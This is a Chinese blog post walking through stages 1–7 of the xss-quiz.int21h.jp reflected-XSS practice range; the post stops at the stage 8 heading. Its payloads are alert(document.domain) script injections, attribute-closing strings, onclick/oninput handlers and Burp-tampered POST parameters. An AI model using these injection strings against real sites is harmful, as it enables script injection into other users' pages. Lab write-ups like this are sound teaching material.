<!doctype html>
<html lang="zh-CN">
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <meta name="referrer" content="no-referrer-when-downgrade">
    

    <title>XSS 靶场练习  | matrix</title>
    <meta property="og:title" content="XSS 靶场练习  - matrix">
    <meta property="og:type" content="article">
        
    <meta property="article:published_time" content='2021-01-10T14:30:24&#43;08:00'>
        
        
    <meta property="article:modified_time" content='2021-01-10T14:30:24&#43;08:00'>
        
    <meta name="Keywords" content="黑客技术，WEB安全，让你听懂每个漏洞成因，明白每个技术原理,博客,项目管理,python,软件架构,公众号,小程序">
    <meta name="description" content="XSS 靶场练习 ">
        
    <meta name="author" content="matrix">
    <meta property="og:url" content="https://gitmatrix.gitee.io/post/OWASP-10/XSS-%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/">
    <link rel="shortcut icon" href='/favicon.ico'  type="image/x-icon">

    <link rel="stylesheet" href='/css/normalize.css'>
    <link rel="stylesheet" href='/css/style.css'>
    <script type="text/javascript" src="//cdn.bootcdn.net/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

    
    
    
        <link href="https://cdn.bootcdn.net/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css" rel="stylesheet">
    
    
    
    
        <link rel="stylesheet" href='/css/douban.css'>
    
        <link rel="stylesheet" href='/css/other.css'>
    
</head>


<body>
    <header id="header" class="clearfix">
    <div class="container">
        <div class="col-group">
            <div class="site-name ">
                
                    <a id="logo" href="https://gitmatrix.gitee.io/">
                        matrix
                    </a>
                
                <p class="description">黑客技术，WEB安全，让你听懂每个漏洞成因，明白每个技术原理</p>
            </div>
            <div>
                <nav id="nav-menu" class="clearfix">
                    <a class="current" href="https://gitmatrix.gitee.io/">首页</a>
                    
                    <a  href="https://gitmatrix.gitee.io/archives/" title="归档">归档</a>
                    
                    <a  href="https://gitmatrix.gitee.io/about/" title="关于">关于</a>
                    
                </nav>
            </div>
        </div>
    </div>
</header>

    <div id="body">
        <div class="container">
            <div class="col-group">

                <div class="col-8" id="main">
                    
<div class="res-cons">
    <style type="text/css">
    .post-toc {
        position: fixed;
        width: 200px;
        margin-left: -210px;
        padding: 5px 10px;
        font-family: Athelas, STHeiti, Microsoft Yahei, serif;
        font-size: 12px;
        border: 1px solid rgba(0, 0, 0, .07);
        border-radius: 5px;
        background-color: rgba(255, 255, 255, 0.98);
        background-clip: padding-box;
        -webkit-box-shadow: 1px 1px 2px rgba(0, 0, 0, .125);
        box-shadow: 1px 1px 2px rgba(0, 0, 0, .125);
        word-wrap: break-word;
        white-space: nowrap;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        z-index: 999;
        cursor: pointer;
        max-height: 70%;
        overflow-y: auto;
        overflow-x: hidden;
    }

    .post-toc .post-toc-title {
        width: 100%;
        margin: 0 auto;
        font-size: 20px;
        font-weight: 400;
        text-transform: uppercase;
        text-align: center;
    }

    .post-toc .post-toc-content {
        font-size: 15px;
    }

    .post-toc .post-toc-content>nav>ul {
        margin: 10px 0;
    }

    .post-toc .post-toc-content ul {
        padding-left: 20px;
        list-style: square;
        margin: 0.5em;
        line-height: 1.8em;
    }

    .post-toc .post-toc-content ul ul {
        padding-left: 15px;
        display: none;
    }

    @media print,
    screen and (max-width:1057px) {
        .post-toc {
            display: none;
        }
    }
</style>
<div class="post-toc" style="position: absolute; top: 188px;">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
        <nav id="TableOfContents">
  <ul>
    <li>
      <ul>
        <li><a href="#第一关">第一关：</a></li>
        <li><a href="#第二关">第二关</a></li>
        <li><a href="#第三关">第三关</a></li>
        <li><a href="#第四关">第四关</a></li>
        <li><a href="#第五关">第五关</a></li>
        <li><a href="#第六关">第六关</a></li>
        <li><a href="#第七关">第七关</a></li>
        <li><a href="#第八关">第八关</a></li>
        <li><a href="#第九关">第九关</a></li>
        <li><a href="#第十关">第十关</a></li>
        <li><a href="#第十一关">第十一关</a></li>
      </ul>
    </li>
  </ul>
</nav>
    </div>
</div>
<script type="text/javascript">
    $(document).ready(function () {
        var postToc = $(".post-toc");
        if (postToc.length) {
            var leftPos = $("#main").offset().left;
            if(leftPos<220){
                postToc.css({"width":leftPos-10,"margin-left":(0-leftPos)})
            }

            var t = postToc.offset().top - 20,
                a = {
                    start: {
                        position: "absolute",
                        top: t
                    },
                    process: {
                        position: "fixed",
                        top: 20
                    },
                };
            $(window).scroll(function () {
                var e = $(window).scrollTop();
                e < t ? postToc.css(a.start) : postToc.css(a.process)
            })
        }
    })
</script>
    <article class="post">
        <header>
            <h1 class="post-title">XSS 靶场练习 </h1>
        </header>
        <date class="post-meta meta-date">
            2021年1月10日
        </date>
        
        <div class="post-meta">
            <span>|</span>
            
            <span class="meta-category"><a href='/categories/Web-%E5%AE%89%E5%85%A8'>Web 安全</a></span>
            
            <span class="meta-category"><a href='/categories/%E5%8D%81%E5%A4%A7%E6%BC%8F%E6%B4%9E'>十大漏洞</a></span>
            
        </div>
        
        
        <div class="post-meta">
            <span id="busuanzi_container_page_pv">|<span id="busuanzi_value_page_pv"></span><span>
                    阅读</span></span>
        </div>
        
        
        <div class="clear" style="display: none">
            <div class="toc-article">
                <div class="toc-title">文章目录</div>
            </div>
        </div>
        
        <div class="post-content">
            <p>反射型跨站脚本漏洞练习</p>
<p><strong>在线XSS靶场<a href="http://xss-quiz.int21h.jp/">http://xss-quiz.int21h.jp/</a></strong></p>
<h3 id="第一关">第一关：</h3>
<p><a href="http://xss-quiz.int21h.jp/">http://xss-quiz.int21h.jp/</a></p>
<p>第一关很简单，但是方法很重要</p>
<p><strong>测试：</strong></p>
<ol>
<li>
<p>了解网页结构后，尝试输入一些正常字符查看效果：</p>
<p>
        <a data-fancybox="gallery" href="https://i.loli.net/2021/01/15/xMrKubaGdpLQofi.png">
            <img class="mx-auto" alt="image-20210115154424362" src="https://i.loli.net/2021/01/15/xMrKubaGdpLQofi.png" />
        </a>
    </p>
<p>结果： 正常字符输入后会以<!-- raw HTML omitted --> 标签包裹得形式之间返回，并没有其他过滤</p>
</li>
<li>
<p>payload 直接输入js 代码,就通关成功</p>
</li>
</ol>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#000;font-weight:bold">&lt;</span>script<span style="color:#000;font-weight:bold">&gt;</span> alert(<span style="color:#0086b3">document</span>.domain);<span style="color:#000;font-weight:bold">&lt;</span><span style="color:#a61717;background-color:#e3d2d2">/script&gt;</span>
</code></pre></td></tr></table>
</div>
</div><h3 id="第二关">第二关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage2.php?sid=3872ca38e2ccee39568e73ec70655924d6677f9d">http://xss-quiz.int21h.jp/stage2.php?sid=3872ca38e2ccee39568e73ec70655924d6677f9d</a></p>
<p>第二关主要考察的是属性闭合</p>
<p><strong>测试：</strong></p>
<ol>
<li>输入正常字符后页面基本没有变化，但是输入框中的字符还在。查看源代码，输入字符直接变成input输入框中的 value 属性值</li>
</ol>
<p>
        <a data-fancybox="gallery" href="https://i.loli.net/2021/01/15/cLYmDS5PFz4X6Ra.png">
            <img class="mx-auto" alt="image-20210115155625058" src="https://i.loli.net/2021/01/15/cLYmDS5PFz4X6Ra.png" />
        </a>
    </p>
<ol start="2">
<li>
<p>知道变化方式后,我们尝试闭合和掉input和value 属性进行尝试</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html"><span style="color:#998;font-style:italic">&lt;!-- 源码 --&gt;</span>
&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;50&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;sdffg&#34;</span>&gt;
   
<span style="color:#998;font-style:italic">&lt;!-- 闭合后的结果 --&gt;</span>
&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;50&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;“&gt;&lt;script&gt;alert(document.domain)&lt;script&gt;&#34;</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p>payload ：所以构造语句如：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js">rdg<span style="color:#a61717;background-color:#e3d2d2">&#34;</span><span style="color:#000;font-weight:bold">&gt;&lt;</span>script<span style="color:#000;font-weight:bold">&gt;</span>alert(<span style="color:#0086b3">document</span>.domain)<span style="color:#000;font-weight:bold">&lt;</span><span style="color:#a61717;background-color:#e3d2d2">/script&gt;</span>
</code></pre></td></tr></table>
</div>
</div></li>
</ol>
<h3 id="第三关">第三关</h3>
<p><strong>测试：</strong></p>
<ol>
<li>在输入框中输入任何字符都会被实例化，以字符输出。</li>
</ol>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115161608884.png">
            <img class="mx-auto" alt="image-20210115161608884" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115161608884.png" />
        </a>
    </p>
<ol start="2">
<li>
<p>从选择框select 中入手尝试，替换掉选择内容。但提交方式为post，无法在浏览器中直接更改，因此选择用burp suite</p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115163834257.png">
            <img class="mx-auto" alt="image-20210115163834257" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115163834257.png" />
        </a>
    </p>
</li>
</ol>
<p>payload 对p2 提交内容进行更改，并放行成功绕过</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js">p1<span style="color:#000;font-weight:bold">=</span>jhkhjhk<span style="color:#000;font-weight:bold">&amp;</span>p2<span style="color:#000;font-weight:bold">=&lt;</span>script<span style="color:#000;font-weight:bold">&gt;</span>alert(<span style="color:#0086b3">document</span>.domain)<span style="color:#000;font-weight:bold">&lt;</span><span style="color:#a61717;background-color:#e3d2d2">/script&gt;</span>
</code></pre></td></tr></table>
</div>
</div><p><strong>其他方法：</strong></p>
<p>在页面中直接添加onclick 鼠标点击事件，进行直接运行js</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#000;font-weight:bold">&lt;</span>input type<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;submit&#34;</span> value<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;Search&#34;</span> onclick<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;alert(document.domain)&#34;</span><span style="color:#000;font-weight:bold">&gt;</span>
    
 onclick<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;alert(document.domain)&#34;</span>   
</code></pre></td></tr></table>
</div>
</div><h3 id="第四关">第四关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage_4.php?sid=8fa79c043647911e43a0e75853fc8627d0390eaa">http://xss-quiz.int21h.jp/stage_4.php?sid=8fa79c043647911e43a0e75853fc8627d0390eaa</a></p>
<p><strong>测试：</strong></p>
<ol>
<li>
<p>第四关于第三关页面一样，但进行同样测试后发现input 输入框和select多选按钮皆被实例化，但是出现第三个参数</p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115165925355.png">
            <img class="mx-auto" alt="image-20210115165925355" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115165925355.png" />
        </a>
    </p>
<p>
        <a data-fancybox="gallery" href="../OWASP%2010/img/image-20210115165637292.png">
            <img class="mx-auto" alt="image-20210115165637292" src="../OWASP%2010/img/image-20210115165637292.png" />
        </a>
    </p>
</li>
</ol>
<p>如图 p3  为隐藏输入框vlaue属性值，因此可以尝试关卡二中的闭环属性</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;hidden&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p3&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;hackme&#34;</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p>payload 从burp suite 中构造语句为</p>
<pre><code class="language-hmtl" data-lang="hmtl">p1=dfs&amp;p2=Japan&amp;p3=&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
</code></pre><h3 id="第五关">第五关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage--5.php?sid=6edff1992b8e47c6255861ef5fde278f04828a3a">http://xss-quiz.int21h.jp/stage&ndash;5.php?sid=6edff1992b8e47c6255861ef5fde278f04828a3a</a></p>
<p><strong>测试：</strong></p>
<ol>
<li>正常输入后发现与第二个返回一样，但input中添加了maxlength 属性限制长度。因此在输入15个字符后无法输入。</li>
<li>
        <a data-fancybox="gallery" href="../OWASP%2010/img/image-20210115171020013.png">
            <img class="mx-auto" alt="image-20210115171020013" src="../OWASP%2010/img/image-20210115171020013.png" />
        </a>
    </li>
</ol>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">maxlength</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;15&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;30&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&#34;</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p><strong>尝试：</strong></p>
<p>payload 在源码中直接改名maxlength 属性后尝试输入构造语句</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">maxlength</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;150&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;30&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&#34;</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p>payload 输入框限制消失，在输入xss 代码。成功绕过</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&#34;&gt;&lt;<span style="color:#000080">script</span>&gt;alert(<span style="color:#0086b3">document</span>.domain)&lt;/<span style="color:#000080">script</span>&gt;
</code></pre></td></tr></table>
</div>
</div><h3 id="第六关">第六关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage-no6.php?sid=1b7149436db10409aeefbc16c60b18095b5a50da">http://xss-quiz.int21h.jp/stage-no6.php?sid=1b7149436db10409aeefbc16c60b18095b5a50da</a></p>
<p><strong>测试:</strong></p>
<ol>
<li>
<p>正常输入数据后返回结果同样添加到value 之中，但输入js代码后源码返回为. 其 &gt; 转义为  &amp; gt;       &lt;  转义为  &amp; lt; 因此不能再使用类似<!-- raw HTML omitted --> js 方式。 所以只能构造事件类型</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html"><span style="color:#998;font-style:italic">&lt;!-- &#34;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;  --&gt;</span>
&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;50&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&#34;</span> <span style="color:#a61717;background-color:#e3d2d2">&amp;</span><span style="color:#008080">gt</span><span style="color:#a61717;background-color:#e3d2d2">;&amp;</span><span style="color:#008080">lt</span><span style="color:#a61717;background-color:#e3d2d2">;</span><span style="color:#008080">script</span><span style="color:#a61717;background-color:#e3d2d2">&amp;</span><span style="color:#008080">gt</span><span style="color:#a61717;background-color:#e3d2d2">;</span><span style="color:#008080">alert</span><span style="color:#a61717;background-color:#e3d2d2">(</span><span style="color:#008080">document</span><span style="color:#a61717;background-color:#e3d2d2">.</span><span style="color:#008080">domain</span><span style="color:#a61717;background-color:#e3d2d2">)&amp;</span><span style="color:#008080">lt</span><span style="color:#a61717;background-color:#e3d2d2">;=&#34;&#34;</span> <span style="color:#008080">script</span><span style="color:#a61717;background-color:#e3d2d2">&amp;</span><span style="color:#008080">gt</span><span style="color:#a61717;background-color:#e3d2d2">;</span>&gt;
   
&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;50&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&lt;srcipt&gt;alert(document.domain);&lt;/srcipt&gt;&#34;</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p>尝试： 在input 输入框中闭合value 添加鼠标事件进行弹窗</p>
<p>payload 构造语句为：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">onclick=&#34;alert(document.domain)&#34;
oninput=&#34;alert(document.domain)&#34;
</code></pre></td></tr></table>
</div>
</div><div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;50&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&#34;</span> <span style="color:#008080">onclick</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;alert(document.domain)&#34;</span> &gt;
</code></pre></td></tr></table>
</div>
</div></li>
</ol>
<h3 id="第七关">第七关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage07.php?sid=57f742ab03a229f187ccc0cbae61d8f38065d5d5">http://xss-quiz.int21h.jp/stage07.php?sid=57f742ab03a229f187ccc0cbae61d8f38065d5d5</a></p>
<blockquote>
<p>nearly the same&hellip; but a bit more tricky.</p>
<p>几乎一样……但更棘手一点。</p>
</blockquote>
<p>根第六关形式一样，但是在输入框的类容都将会实例化，所以需要尝试在其他标签上添加事件</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">input</span> <span style="color:#008080">type</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;text&#34;</span> <span style="color:#008080">name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;p1&#34;</span> <span style="color:#008080">size</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;50&#34;</span> <span style="color:#008080">value</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&amp;quot;onclick=&amp;quot;alert(document.domain)&amp;quot;&#34;</span> <span style="color:#008080">id</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;&amp;quot;1&#34;</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p>payload 如在提交按钮或者a标签上添加事件，这里在a标签中添加鼠标点击事件</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">a</span> <span style="color:#008080">href</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;http://blogged-on.de/xss/&#34;</span> <span style="color:#008080">target</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;_new&#34;</span> <span style="color:#008080">onclick</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;alert(document.domain)&#34;</span>&gt;http://blogged-on.de/xss/&lt;/<span style="color:#000080">a</span>&gt;
</code></pre></td></tr></table>
</div>
</div><h3 id="第八关">第八关</h3>
